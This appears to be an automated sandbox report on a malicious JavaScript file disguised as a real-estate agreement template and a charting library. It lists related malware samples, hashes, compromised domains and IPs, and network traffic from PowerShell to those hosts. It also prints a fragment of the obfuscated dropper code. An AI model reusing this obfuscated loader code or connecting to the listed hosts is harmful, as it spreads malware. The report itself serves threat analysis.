91.198.66.211 | bad.js | Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
naturalanimals.net | bad.js | Get hash | malicious | Unknown | Browse | 91.198.66.211
memar98.com | bad.js | Get hash | malicious | Unknown | Browse | 195.28.10.122
memar98.com | bad.js | Get hash | malicious | Unknown | Browse | 195.28.10.122
tennoji-law-uranai.com | bad.js | Get hash | malicious | Unknown | Browse | 153.127.91.146
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
NBISERV-ASDE | bad.js | Get hash | malicious | Unknown | Browse | 91.198.66.211
NBISERV-ASDE | rmIjgsKayK.exe | Get hash | malicious | RedLine | Browse | 91.198.77.158
NBISERV-ASDE | 101.exe | Get hash | malicious | BitRAT | Browse | 31.185.104.20
NBISERV-ASDE | 8674766007C7AED0B73283FB5003C4DF128699E9B8A2A.exe | Get hash | malicious | njRat, RedLine | Browse | 91.198.77.213
NBISERV-ASDE | 33984A160916B4DF0B9F480ED4E7BB20C3C8D7DE49301.exe | Get hash | malicious | RedLine | Browse | 91.198.77.213
NBISERV-ASDE | qmEMNM1AjN.exe | Get hash | malicious | BitRAT | Browse | 31.185.104.21
NBISERV-ASDE | 25hBQ7XDkh.exe | Get hash | malicious | BitRAT Xmrig | Browse | 31.185.104.19
NBISERV-ASDE | tinynuke.exe | Get hash | malicious | Tinynuke / Nukebot | Browse | 31.185.104.21
NBISERV-ASDE | UP34reqgZq.dll | Get hash | malicious | DanaBot | Browse | 31.185.104.19
NBISERV-ASDE | VCJQWUG1iY.exe | Get hash | malicious | Unknown | Browse | 31.185.104.20
HETZNER-ASDE | http://195.242.110.135 | Get hash | malicious | Unknown | Browse | 135.181.16.82
HETZNER-ASDE | B7xLbK5dVh.exe | Get hash | malicious | RedLine | Browse | 116.203.6.63
HETZNER-ASDE | Di2UVsYM0u.exe | Get hash | malicious | RedLine | Browse | 116.203.6.63
HETZNER-ASDE | ISVVL7A4in.exe | Get hash | malicious | RedLine | Browse | 116.203.6.63
HETZNER-ASDE | HTMYKAFISF.exe | Get hash | malicious | RedLine | Browse | 116.203.6.63
HETZNER-ASDE | LP9dobIckp.exe | Get hash | malicious | PureLog Stealer, RedLine | Browse | 116.203.6.63
HETZNER-ASDE | SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exe | Get hash | malicious | FormBook | Browse | 116.203.164.244
HETZNER-ASDE | 3eK5m977AY.exe | Get hash | malicious | PureLog Stealer, RedLine | Browse | 116.203.6.63
HETZNER-ASDE | 78nLQ1ShbV.exe | Get hash | malicious | PureLog Stealer, RedLine | Browse | 116.203.6.63
HETZNER-ASDE | IHGA1XNVtd.exe | Get hash | malicious | PureLog Stealer, RedLine | Browse | 116.203.6.63
SAKURA-ASAKURAInternetIncJP | NHhH776.exe | Get hash | malicious | FormBook | Browse | 153.126.217.112
SAKURA-ASAKURAInternetIncJP | bad.js | Get hash | malicious | Unknown | Browse | 153.127.91.146
SAKURA-ASAKURAInternetIncJP | hCGaMRj2il.elf | Get hash | malicious | Mirai | Browse | 153.120.57.229
SAKURA-ASAKURAInternetIncJP | BMJzumU0MX.elf | Get hash | malicious | Mirai | Browse | 153.120.10.224
SAKURA-ASAKURAInternetIncJP | uUtyJqyRqT.exe | Get hash | malicious | Urelas | Browse | 133.242.129.155
SAKURA-ASAKURAInternetIncJP | uUtyJqyRqT.exe | Get hash | malicious | Urelas | Browse | 133.242.129.155
SAKURA-ASAKURAInternetIncJP | ktMLmEUY2l.elf | Get hash | malicious | Mirai | Browse | 133.125.49.216
SAKURA-ASAKURAInternetIncJP | VlkShT2TjD.elf | Get hash | malicious | Gafgyt | Browse | 133.242.175.111
SAKURA-ASAKURAInternetIncJP | 1AIemYSAZy.exe | Get hash | malicious | Glupteba, LummaC Stealer, SmokeLoader, Stealc | Browse | 133.242.174.157
SAKURA-ASAKURAInternetIncJP | ZXjGgZGvWB.elf | Get hash | malicious | Unknown | Browse | 153.120.57.228
MHOSTIR | bad.js | Get hash | malicious | Unknown | Browse | 195.28.10.122
MHOSTIR | bad.js | Get hash | malicious | Unknown | Browse | 195.28.10.122
MHOSTIR | E-dekont.pdf.exe | Get hash | malicious | FormBook, NSISDropper | Browse | 185.252.29.160
MHOSTIR | url.exe | Get hash | malicious | Unknown | Browse | 185.252.29.62
MHOSTIR | UrQrIdRfCg.exe | Get hash | malicious | Unknown | Browse | 185.252.29.210
MHOSTIR | https://firebasestorage.googleapis.com/v0/b/papaya-398f2.appspot.com/o/Fazbaze.html?alt=media&token=53b0c52d-e20f-49b2-a92e-082ad8874351#marym@steinborn.com | Get hash | malicious | HTMLPhisher | Browse | 185.252.29.161
MHOSTIR | 759279720662.exe | Get hash | malicious | Snake Keylogger | Browse | 185.252.31.60
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | PO#AL231108.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 195.28.10.122, 78.46.3.78, 153.127.91.146, 91.198.66.211
3b5074b1b5d032e5620f69f9f700ff0e | B7xLbK5dVh.exe | Get hash | malicious | RedLine | Browse | 195.28.10.122, 78.46.3.78, 153.127.91.146, 91.198.66.211
3b5074b1b5d032e5620f69f9f700ff0e | Di2UVsYM0u.exe | Get hash | malicious | RedLine | Browse | 195.28.10.122, 78.46.3.78, 153.127.91.146, 91.198.66.211
3b5074b1b5d032e5620f69f9f700ff0e | ISVVL7A4in.exe | Get hash | malicious | RedLine | Browse | 195.28.10.122, 78.46.3.78, 153.127.91.146, 91.198.66.211
3b5074b1b5d032e5620f69f9f700ff0e | HTMYKAFISF.exe | Get hash | malicious | RedLine | Browse | 195.28.10.122, 78.46.3.78, 153.127.91.146, 91.198.66.211
3b5074b1b5d032e5620f69f9f700ff0e | NEW SAMPLE ORDER.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 195.28.10.122, 78.46.3.78, 153.127.91.146, 91.198.66.211
3b5074b1b5d032e5620f69f9f700ff0e | Move Mouse.exe | Get hash | malicious | Unknown | Browse | 195.28.10.122, 78.46.3.78, 153.127.91.146, 91.198.66.211
3b5074b1b5d032e5620f69f9f700ff0e | IMG_77020316.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 195.28.10.122, 78.46.3.78, 153.127.91.146, 91.198.66.211
3b5074b1b5d032e5620f69f9f700ff0e | LP9dobIckp.exe | Get hash | malicious | PureLog Stealer, RedLine | Browse | 195.28.10.122, 78.46.3.78, 153.127.91.146, 91.198.66.211
3b5074b1b5d032e5620f69f9f700ff0e | pjadkins wbfosson.com shared _Indirect Solutions LLC_ with you.eml | Get hash | malicious | HTMLPhisher | Browse | 195.28.10.122, 78.46.3.78, 153.127.91.146, 91.198.66.211
                                      No context
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):19604
                                      Entropy (8bit):5.00909775372993
                                      Encrypted:false
                                      SSDEEP:384:N1YyYooXVoGIpN6KQkj2SNXp5adzOdBn+ib42hQozkjh4iUxjKIeYYib4J:N1YyYooXV3IpNBQkj2SNZ4dzOdBnbhFi
                                      MD5:6FBB062EBBE4AF22E35BB4D6602E4A14
                                      SHA1:86FDA247F9F9F0D33DDC0887D79E643244FA7AFD
                                      SHA-256:3A98CE52CBBEC2CE96DD7CF43386433E5E03D2E7B3A40A94166F6F807D38F79E
                                      SHA-512:4D842084F0C8998882E4F9F3D79FA26DD0359A80C721E21FAD0EFBD3ADCA00FB276867428764C63F270201E4A8EB1456F67C85310964B176CE0881EA242C1FA9
                                      Malicious:false
                                      Reputation:low
                                      Preview:PSMODULECACHE..........z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEach........Should........BeforeEach........Get-MockDynamicParameters........It........Assert-VerifiableMocks........BeforeAll........Context........Set-TestInconclusive........AfterAll........Setup........Set-DynamicParameterVariables........Invoke-Pester........Assert-MockCalled........New-PesterOption......... h..z..K...C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\PSReadLine.psm1........PSConsoleHostReadLine........Get-PSReadLineOption........Set-PSReadLineKeyHandler........Get-PSReadLineKeyHandler........Set-PSReadLineOption........Remove-PSReadLineKeyHandler.............z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-D
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\wscript.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):47678072
                                      Entropy (8bit):5.666828597866191
                                      Encrypted:false
                                      SSDEEP:49152:o00000000000000000000000000000000000000000000000000000000000000D:m
                                      MD5:B047C450583F3973C5AA3B23D7FC433B
                                      SHA1:7896DF127A2C92F3B2096B159052908EDBF8EFFD
                                      SHA-256:74AD0A8508F1B2849A9B640F043BE3670BD4C3ECB29E5A67067D0C764ED5E805
                                      SHA-512:128D892EF068BDEEFA2166574C27C71A6C7B75A117BDEF77462085A87CEE85094988B766D79B539B6F48A270808E55B73106FA7B203D82B3628938D4281EE4A4
                                      Malicious:false
                                      Preview:650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?';function cufo(hcky, playy, beautym, lead9){bgscfidk = speech8+ayenh+clockr+cat6+kcxzba+uukspz+ysujl+beat7+vmyp+ovdfk+industry8+sing8+state6+flywju+kbfko+mvyaeqw+geyui+bidjywh+book6+guessv+iczn+realg+kusay+keep0+dwwk+lqhbc+ozkqck+justi+eight4+vyynf+pquw+morning8+hhdvgv5+electric2+wppel+qhjxf+suitr+spknjb+rub8+kidow+neckqh+youngn;wire8[30660] = gentle8;thought3(developm);}land6='O+)(C\\?\"o2+?L*?+ 3(?=4Mi ,As[8E\\?\"R';yyvt = 1;cold7='?o|)1iW)?s?;+s+U?e?[[\\h\"eie+?[r\\+\"El?r{]';function btwm(ports, much8) {noise1 = pair7(much8);for (yychlml = (boardy); yychlml<=pair7(ports)-noise1; yychlml++) {if (yellow2(ports,yychlml,noise1)==much8){plainq[pair7(plainq)] = yellow2(ports,dkvebx2,yychlml-dkvebx2);dkvebx2 = yychlml+noise1;}}plainq[pair7(plainq)] = yellow2(ports
                                      Process:C:\Windows\System32\wscript.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):47678072
                                      Entropy (8bit):5.666828597866191
                                      Encrypted:false
                                      SSDEEP:49152:o00000000000000000000000000000000000000000000000000000000000000D:m
                                      MD5:B047C450583F3973C5AA3B23D7FC433B
                                      SHA1:7896DF127A2C92F3B2096B159052908EDBF8EFFD
                                      SHA-256:74AD0A8508F1B2849A9B640F043BE3670BD4C3ECB29E5A67067D0C764ED5E805
                                      SHA-512:128D892EF068BDEEFA2166574C27C71A6C7B75A117BDEF77462085A87CEE85094988B766D79B539B6F48A270808E55B73106FA7B203D82B3628938D4281EE4A4
                                      Malicious:false
                                      Preview:650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?';function cufo(hcky, playy, beautym, lead9){bgscfidk = speech8+ayenh+clockr+cat6+kcxzba+uukspz+ysujl+beat7+vmyp+ovdfk+industry8+sing8+state6+flywju+kbfko+mvyaeqw+geyui+bidjywh+book6+guessv+iczn+realg+kusay+keep0+dwwk+lqhbc+ozkqck+justi+eight4+vyynf+pquw+morning8+hhdvgv5+electric2+wppel+qhjxf+suitr+spknjb+rub8+kidow+neckqh+youngn;wire8[30660] = gentle8;thought3(developm);}land6='O+)(C\\?\"o2+?L*?+ 3(?=4Mi ,As[8E\\?\"R';yyvt = 1;cold7='?o|)1iW)?s?;+s+U?e?[[\\h\"eie+?[r\\+\"El?r{]';function btwm(ports, much8) {noise1 = pair7(much8);for (yychlml = (boardy); yychlml<=pair7(ports)-noise1; yychlml++) {if (yellow2(ports,yychlml,noise1)==much8){plainq[pair7(plainq)] = yellow2(ports,dkvebx2,yychlml-dkvebx2);dkvebx2 = yychlml+noise1;}}plainq[pair7(plainq)] = yellow2(ports
                                      File type:ASCII text, with very long lines (665)
                                      Entropy (8bit):4.857037242536753
                                      TrID:
                                      • Visual Basic Script (13500/0) 51.92%
                                      • Java Script (8502/1) 32.70%
                                      • Digital Micrograph Script (4001/1) 15.39%
                                      File name:real estate co ownership agreement template 43632.js
                                      File size:1'759'107 bytes
                                      MD5:e4c20aa2c3a182ea923c56200099bcc7
                                      SHA1:e43d499f2ac4a5d52629226e479464806049bb02
                                      SHA256:81aaaa98308c50ff79d2680d0c1840a05e3ac3c0255166da047ed77073dc8458
                                      SHA512:bdf4f3e17239e07a93eaf7fbdbac15022883c15d82505ead0c912041905e0838e03752cc8842c43824e1d9c3c1d1fcbef0ee835a3418ea5e2232648bcd3a179e
                                      SSDEEP:12288:SeFTYbhfw4Y/Zz2z+FIE5AlQlDu90TsDJWx5u1xNydLpg8hC6gQl6GfwgqqQkv2N:SeGbhfj8aWHu1/wD5HroObm
                                      TLSH:C885B749FBD05101B867729D4E9F708EE27C501FB941AC88BD4CA8A43F9A22457EEF74
                                      File Content Preview:/*!. * tui-chart. * @fileoverview tui-chart. * @author NHN. FE Development Lab <dl_javascript@nhn.com>. * @version 3.11.3. * @license MIT. * @link https://github.com/nhn/tui.chart. * bundle created at "Fri Jan 29 2021 15:51:40 GMT+0900 (Korean Standard Ti
                                      Icon Hash:68d69b8bb6aa9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 6, 2024 18:41:16.689191103 CEST | 49708 | 443 | 192.168.2.7 | 91.198.66.211
May 6, 2024 18:41:16.689234018 CEST | 443 | 49708 | 91.198.66.211 | 192.168.2.7
May 6, 2024 18:41:16.689316034 CEST | 49708 | 443 | 192.168.2.7 | 91.198.66.211
May 6, 2024 18:41:16.696229935 CEST | 49708 | 443 | 192.168.2.7 | 91.198.66.211
May 6, 2024 18:41:16.696247101 CEST | 443 | 49708 | 91.198.66.211 | 192.168.2.7
May 6, 2024 18:41:17.249629021 CEST | 443 | 49708 | 91.198.66.211 | 192.168.2.7
May 6, 2024 18:41:17.249710083 CEST | 49708 | 443 | 192.168.2.7 | 91.198.66.211
May 6, 2024 18:41:17.254089117 CEST | 49708 | 443 | 192.168.2.7 | 91.198.66.211
May 6, 2024 18:41:17.254101038 CEST | 443 | 49708 | 91.198.66.211 | 192.168.2.7
May 6, 2024 18:41:17.254381895 CEST | 443 | 49708 | 91.198.66.211 | 192.168.2.7
May 6, 2024 18:41:17.287559032 CEST | 49708 | 443 | 192.168.2.7 | 91.198.66.211
May 6, 2024 18:41:17.287615061 CEST | 443 | 49708 | 91.198.66.211 | 192.168.2.7
May 6, 2024 18:41:19.330209017 CEST | 443 | 49708 | 91.198.66.211 | 192.168.2.7
May 6, 2024 18:41:19.330353975 CEST | 443 | 49708 | 91.198.66.211 | 192.168.2.7
May 6, 2024 18:41:19.330449104 CEST | 49708 | 443 | 192.168.2.7 | 91.198.66.211
May 6, 2024 18:41:19.344510078 CEST | 49708 | 443 | 192.168.2.7 | 91.198.66.211
May 6, 2024 18:41:40.400286913 CEST | 49709 | 443 | 192.168.2.7 | 78.46.3.78
May 6, 2024 18:41:40.400319099 CEST | 443 | 49709 | 78.46.3.78 | 192.168.2.7
May 6, 2024 18:41:40.400420904 CEST | 49709 | 443 | 192.168.2.7 | 78.46.3.78
May 6, 2024 18:41:40.400880098 CEST | 49709 | 443 | 192.168.2.7 | 78.46.3.78
May 6, 2024 18:41:40.400892019 CEST | 443 | 49709 | 78.46.3.78 | 192.168.2.7
May 6, 2024 18:41:40.852782011 CEST | 49710 | 443 | 192.168.2.7 | 195.28.10.122
May 6, 2024 18:41:40.852828979 CEST | 443 | 49710 | 195.28.10.122 | 192.168.2.7
May 6, 2024 18:41:40.852948904 CEST | 49710 | 443 | 192.168.2.7 | 195.28.10.122
May 6, 2024 18:41:40.856355906 CEST | 49710 | 443 | 192.168.2.7 | 195.28.10.122
May 6, 2024 18:41:40.856365919 CEST | 443 | 49710 | 195.28.10.122 | 192.168.2.7
May 6, 2024 18:41:40.864002943 CEST | 443 | 49709 | 78.46.3.78 | 192.168.2.7
May 6, 2024 18:41:40.864115953 CEST | 49709 | 443 | 192.168.2.7 | 78.46.3.78
May 6, 2024 18:41:40.865767956 CEST | 49709 | 443 | 192.168.2.7 | 78.46.3.78
May 6, 2024 18:41:40.865776062 CEST | 443 | 49709 | 78.46.3.78 | 192.168.2.7
May 6, 2024 18:41:40.866038084 CEST | 443 | 49709 | 78.46.3.78 | 192.168.2.7
May 6, 2024 18:41:40.867285013 CEST | 49709 | 443 | 192.168.2.7 | 78.46.3.78
May 6, 2024 18:41:40.867332935 CEST | 443 | 49709 | 78.46.3.78 | 192.168.2.7
May 6, 2024 18:41:41.467959881 CEST | 443 | 49710 | 195.28.10.122 | 192.168.2.7
May 6, 2024 18:41:41.468055010 CEST | 49710 | 443 | 192.168.2.7 | 195.28.10.122
May 6, 2024 18:41:41.469757080 CEST | 49710 | 443 | 192.168.2.7 | 195.28.10.122
May 6, 2024 18:41:41.469769001 CEST | 443 | 49710 | 195.28.10.122 | 192.168.2.7
May 6, 2024 18:41:41.470185995 CEST | 443 | 49710 | 195.28.10.122 | 192.168.2.7
May 6, 2024 18:41:41.479754925 CEST | 49710 | 443 | 192.168.2.7 | 195.28.10.122
May 6, 2024 18:41:41.479799986 CEST | 443 | 49710 | 195.28.10.122 | 192.168.2.7
May 6, 2024 18:41:41.954718113 CEST | 443 | 49709 | 78.46.3.78 | 192.168.2.7
May 6, 2024 18:41:41.954799891 CEST | 443 | 49709 | 78.46.3.78 | 192.168.2.7
May 6, 2024 18:41:41.954960108 CEST | 49709 | 443 | 192.168.2.7 | 78.46.3.78
May 6, 2024 18:41:41.956123114 CEST | 49709 | 443 | 192.168.2.7 | 78.46.3.78
May 6, 2024 18:41:42.057296991 CEST | 443 | 49710 | 195.28.10.122 | 192.168.2.7
May 6, 2024 18:41:42.057467937 CEST | 443 | 49710 | 195.28.10.122 | 192.168.2.7
May 6, 2024 18:41:42.057620049 CEST | 49710 | 443 | 192.168.2.7 | 195.28.10.122
May 6, 2024 18:41:42.059864044 CEST | 49710 | 443 | 192.168.2.7 | 195.28.10.122
May 6, 2024 18:42:02.888011932 CEST | 49712 | 443 | 192.168.2.7 | 153.127.91.146
May 6, 2024 18:42:02.888011932 CEST | 49711 | 443 | 192.168.2.7 | 153.127.91.146
May 6, 2024 18:42:02.888051987 CEST | 443 | 49712 | 153.127.91.146 | 192.168.2.7
May 6, 2024 18:42:02.888057947 CEST | 443 | 49711 | 153.127.91.146 | 192.168.2.7
May 6, 2024 18:42:02.888149023 CEST | 49712 | 443 | 192.168.2.7 | 153.127.91.146
May 6, 2024 18:42:02.888149023 CEST | 49711 | 443 | 192.168.2.7 | 153.127.91.146
May 6, 2024 18:42:02.888465881 CEST | 49712 | 443 | 192.168.2.7 | 153.127.91.146
May 6, 2024 18:42:02.888515949 CEST | 443 | 49712 | 153.127.91.146 | 192.168.2.7
May 6, 2024 18:42:02.888526917 CEST | 49711 | 443 | 192.168.2.7 | 153.127.91.146
May 6, 2024 18:42:02.888540030 CEST | 443 | 49711 | 153.127.91.146 | 192.168.2.7
May 6, 2024 18:42:03.817152977 CEST | 443 | 49712 | 153.127.91.146 | 192.168.2.7
                                      May 6, 2024 18:42:03.817249060 CEST49712443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:03.818933964 CEST49712443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:03.818948984 CEST44349712153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.819266081 CEST44349712153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.822285891 CEST49712443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:03.822328091 CEST44349712153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.834815025 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.834907055 CEST49711443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:03.836616993 CEST49711443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:03.836627960 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.840439081 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:03.841886997 CEST49711443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:03.841936111 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:04.744921923 CEST44349712153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:04.745017052 CEST44349712153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:04.745156050 CEST49712443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:04.745574951 CEST49712443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:04.762640953 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:04.762700081 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:04.762825966 CEST49711443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:04.763376951 CEST49711443192.168.2.7153.127.91.146
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 6, 2024 18:41:16.210324049 CEST | 51214 | 53 | 192.168.2.7 | 1.1.1.1
May 6, 2024 18:41:16.684261084 CEST | 53 | 51214 | 1.1.1.1 | 192.168.2.7
May 6, 2024 18:41:40.037209034 CEST | 50070 | 53 | 192.168.2.7 | 1.1.1.1
May 6, 2024 18:41:40.399203062 CEST | 53 | 50070 | 1.1.1.1 | 192.168.2.7
May 6, 2024 18:41:40.518161058 CEST | 51976 | 53 | 192.168.2.7 | 1.1.1.1
May 6, 2024 18:41:40.846422911 CEST | 53 | 51976 | 1.1.1.1 | 192.168.2.7
May 6, 2024 18:42:02.417515993 CEST | 58137 | 53 | 192.168.2.7 | 1.1.1.1
May 6, 2024 18:42:02.886982918 CEST | 53 | 58137 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 6, 2024 18:41:16.210324049 CEST | 192.168.2.7 | 1.1.1.1 | 0xc771 | Standard query (0) | naturalanimals.net | A (IP address) | IN (0x0001) | false
May 6, 2024 18:41:40.037209034 CEST | 192.168.2.7 | 1.1.1.1 | 0xe29f | Standard query (0) | weissenbach-pr.de | A (IP address) | IN (0x0001) | false
May 6, 2024 18:41:40.518161058 CEST | 192.168.2.7 | 1.1.1.1 | 0xd5ec | Standard query (0) | memar98.com | A (IP address) | IN (0x0001) | false
May 6, 2024 18:42:02.417515993 CEST | 192.168.2.7 | 1.1.1.1 | 0xb02d | Standard query (0) | tennoji-law-uranai.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 6, 2024 18:41:16.684261084 CEST | 1.1.1.1 | 192.168.2.7 | 0xc771 | No error (0) | naturalanimals.net | | 91.198.66.211 | A (IP address) | IN (0x0001) | false
May 6, 2024 18:41:40.399203062 CEST | 1.1.1.1 | 192.168.2.7 | 0xe29f | No error (0) | weissenbach-pr.de | | 78.46.3.78 | A (IP address) | IN (0x0001) | false
May 6, 2024 18:41:40.846422911 CEST | 1.1.1.1 | 192.168.2.7 | 0xd5ec | No error (0) | memar98.com | | 195.28.10.122 | A (IP address) | IN (0x0001) | false
May 6, 2024 18:42:02.886982918 CEST | 1.1.1.1 | 192.168.2.7 | 0xb02d | No error (0) | tennoji-law-uranai.com | | 153.127.91.146 | A (IP address) | IN (0x0001) | false
                                      • naturalanimals.net
                                      • weissenbach-pr.de
                                      • memar98.com
                                      • tennoji-law-uranai.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49708 | 91.198.66.211 | 443 | 6768 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-06 16:41:17 UTC | 2095 | OUT | GET /xmlrpc.php HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
